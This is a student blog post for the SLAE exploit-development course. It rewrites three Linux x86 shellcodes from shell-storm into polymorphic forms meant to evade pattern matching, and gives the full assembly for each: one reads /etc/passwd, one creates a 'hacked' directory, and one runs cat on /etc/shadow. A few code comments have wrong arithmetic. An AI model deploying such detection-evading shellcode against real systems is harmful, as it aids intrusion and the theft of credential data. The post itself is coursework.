SLAE ASSIGNMENT 6 | POLYMORPHIC SHELLCODE'S - LINUX X86
Hello Shellcoders,This blog post has been created for completing the requirements of SecurityTube Linux Assembly Expert Certification: http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/ Student ID: SLAE - 1342
Welcome to Pwsec land. Well if you haven’t read my last blog post in which I completed writing my SLAE Assignment 5 blog post on “METASPLOIT SHELLCODE'S ANALYSIS - LINUX X86”, then you can check it [Here]. Today in this post we will be creating three Polymorphic Linux x86 Shellcodes which we will take from the shell-storm website. So the requirement for the sixth SLAE exam assignment is:
- Take up 3 shellcode from shell-storm and create a polymorphic version of them to beat the pattern matching.
- The polymorphic versions can not be larger than 50% of the existing shellcode.
- Bonus point for making it shorter in length than original
I have chosen these three shellcodes.
- http://shell-storm.org/shellcode/files/shellcode-842.php
- http://shell-storm.org/shellcode/files/shellcode-542.php
- http://shell-storm.org/shellcode/files/shellcode-758.php
So I have selected these three shellcodes for the completion of this assignment.
Let’s first understand what a polymorphism is by wikipedia :- In computer terminology, polymorphic code is a code that uses a polymorphic engine to mutate while keeping the original algorithm intact. That is, the code changes itself each time it runs, but the function of the code (its semantics) will not change at all. For example, 1+3 and 6-2 both achieve the same result while using different values and operations. This technique is sometimes used by computer viruses, shellcodes and computer worms to hide their presence.
Also I have written comments with my polymorphic version of the shellcode.
Also I have written comments with my polymorphic version of the shellcode.
Polymorphic shellcode 1
So this is a shellcode which will try to read the first 4096 bytes from /etc/passwd file. The author of this shellcode is geyslan. You can find the shellcode [here].
Let’s run it,
So the original shellcode length is 57 Bytes currently, and as you can see it printed out the contents of /etc/passwd.
Here is the polymorphic version of this shellcode.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ;SLAE-1342 | |
| ;Original shellcode:- http://shell-storm.org/shellcode/files/shellcode-842.php | |
| global _start | |
| section .text | |
| _start: | |
| lahf ;Load Flags into AH Register | |
| cmc ;Compliment the carry flag | |
| xor eax,eax ;Anything xor with itself would result zero | |
| cdq ;edx is now 0 as cdq convert dword to quad word and uses edx:eax | |
| push edx ;push null on stack | |
| add al,0x5 ;add 5 to al register, so 0+5=5 | |
| push dword 0x64777373 | |
| push dword 0x61702f63 | |
| push dword 0x74652f2f | |
| mov ebx,esp | |
| int 0x80 | |
| push eax ;push eax value on stack | |
| mov ecx,ebx ;move ebx value to ecx | |
| push ebx ;push ebx on stack | |
| pop eax ;pop out the first value on top of the stack | |
| pop ebx ;pop out the value at top of the stack, | |
| ;we did all this just to move the value of eax to ebx | |
| xor eax,eax ;Anything xor with itself would result zero | |
| add al,0x3 ;add 5 to al register, so 0+3=3 | |
| mov dx,0xfff | |
| inc edx | |
| int 0x80 | |
| xchg eax,edx ;exchange the value of eax and edx | |
| xor eax,eax ;Anything xor with itself would result zero | |
| push byte 0x4 ;push 0x4 on stack | |
| push byte 0x1 ;push 0x1 on stack | |
| pop ebx ;pop out the 1 , so now ebx will hold the value 0x1 | |
| pop eax ;pop out the 0x4, so now eax will hold out the value 0x4 | |
| int 0x80 | |
| xchg eax,ebx ;ebx was 1, and for exit() the syscall number is one so just exchange the value of eax and ebx registers | |
| int 0x80 | |
| db 0x0a |
Let's run it,
Now the shellcode length is: 59 Bytes
[Note:Please refer to this video if you also don’t know how to calculate the percentage increase.]
Size Increased by: 3.5%
Polymorphic shellcode 2
So this is a shellcode which will try to create a directory with the name “Hacked”. The author of this shellcode is zillion. You can find the shellcode [here]
Let’s run it,
So the original shellcode length is 36 Bytes currently, and as you can see it just created a new directory with the name “hacked”.
Here is the polymorphic version of this shellcode.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ;SLAE-1342 | |
| ;Original shellcode:- http://shell-storm.org/shellcode/files/shellcode-542.php | |
| global _start | |
| section .text | |
| _start: | |
| jmp short ok ;jump to ok | |
| okk: | |
| xor ecx,ecx ;Anything xor with itself would result zero | |
| mul ecx ;The classic use of mul instruction. Now the eax:edx will become 0 | |
| pop esi | |
| push byte 0x27 ;push the byte 0x27 on stack | |
| pop eax ;pop the value 0x27 out from stack and will get store in eax | |
| lea ebx,[esi] | |
| push word 0x1ed ;push the byte 0x1ed on stack | |
| pop ecx ;pop the value 0x1ed out from stack and will get store in ecx | |
| int 0x80 | |
| xor eax,eax ;Anything xor with itself would result zero | |
| inc eax ;increase the eax value by 1, now eax will be 0x1 | |
| int 0x80 | |
| ok: | |
| call okk ;call okk | |
| msg: db "hacked" ;msg holds the string "hacked" |
Let’s run it,
Now the shellcode length is: 35 Bytes
Size Decreased by: 2.7%
Polymorphic shellcode 3
So this is a shellcode which will try to read try to read the file /etc/shadow using /bin/cat command. It will be using execve function to execute this command. The author of this shellcode is antrhacks. You can find the shellcode [here]
Let’s run it,
So the original shellcode length is 42 Bytes currently, and as you can see it printed out the contents of /etc/shadow file.
Here is the polymorphic version of this shellcode.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ;SLAE-1342 | |
| ;Original shellcode:- http://shell-storm.org/shellcode/files/shellcode-758.php | |
| global _start | |
| section .text | |
| _start: | |
| xor ecx,ecx ;Anything xor with itself would result zero | |
| mul ecx ;The classic use of mul instruction. Now the eax:edx will become 0 | |
| push edx ;push nulls on stack | |
| push dword 0x7461632f | |
| push word 0x6e69 ;push 0x6e69 on stack | |
| push word 0x622f ;push 0x622f on stack | |
| mov ebx,esp | |
| push ecx ;push nulls on stack | |
| push dword 0x776f6461 | |
| push word 0x6873 ;push 0x6873 on stack | |
| push word 0x2f2f ;push 0x2f2f on stack | |
| push dword 0x6374652f | |
| mov ecx,esp | |
| push edx ;push nulls on stack | |
| push ecx | |
| push ebx | |
| mov ecx,esp | |
| add al,10 ;add 5 to al register, so 0+10=10 | |
| inc eax ;increase the value of eax by one, so now eax will be 11 i.e 0xb | |
| int 0x80 |
Let’s run it,
Now the shellcode length is: 51 Bytes
Size Increased by: 21.4%
Pretty easy, huh? If you still have any doubt, then please feel free to ping me on twitter [@Pwsecspirit]
Thanks,
Post a Comment:
Please tell us if we have done anything wrong :) and please share our website if you like.